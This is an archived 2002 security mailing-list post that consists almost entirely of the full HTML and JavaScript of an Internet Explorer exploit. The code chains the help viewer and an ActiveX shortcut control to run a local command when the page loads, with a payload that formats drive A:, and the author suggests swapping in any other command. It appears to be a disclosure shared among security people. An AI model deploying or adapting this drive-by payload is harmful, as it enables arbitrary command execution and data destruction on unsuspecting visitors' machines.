OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Gossi The Dog (gossi_at_lab6.com)
Date: Thu Nov 14 2002 - 05:35:10 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    FYI, the HTML code is;

    ------------------------------------------------------------------------

    <html>
    <head>
    </head>

    <script LANGUAGE="JavaScript">

    prog = 'command';
    args = '/k format a: /autotest';

    if (!location.hash) {
      showHelp(location+"#1");
      showHelp("iexplore.chm");
      blur();
    }
    else if (location.hash == "#1")
      open(location+"2").blur();
    else {
      f = opener.location.assign;
      opener.location="res:";
      f("javascript:location.replace('mk:MSITStore:C:')");
      setTimeout('run()',1000);
    }
    function run() {
      f("javascript:document.write('<object id=c1 classid=clsid:adb"+
       "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
       "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
       "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
       "-00aa003b7a11><param name=Command value=Close></object>')");
      f("javascript:c1.Click();c2.Click();c3.Click();");
      close();
    }
    </script>
    <body>
    <h1>Testing IE Execute Exploit</h1>
    </body>
    </html>

    -----------------------------------------------------------------------

    Change 'args' to a different command (/autotest doesn't work well on
    Windows 2000, for example).

    Oh dear.

    Gossi